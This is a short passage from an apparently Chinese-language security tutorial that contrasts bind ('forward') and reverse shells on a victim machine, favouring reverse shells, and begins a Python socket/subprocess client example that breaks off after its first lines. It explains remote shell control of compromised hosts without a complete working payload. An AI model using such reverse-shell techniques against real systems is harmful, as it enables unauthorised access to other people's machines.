正向反向区别
正向即我们通过一系列手段在受害机开放了一个端口,这个端口等待我们连接,受害机不会主动告诉我们让我们去连接,导致我们必须要知道受害机的IP地址,实际操作会很困难。所以现在都是用反向,与正向最大区别是,受害机会通知我们,将shell返回。
示例
Python中通过连接并执行命令主要用到了socket和subprocess两个模块,以下是一个简单的示例。
Client.py
# -*- coding: utf-8 -*- import socket while 1: str_msg = raw_input("Please input command:") |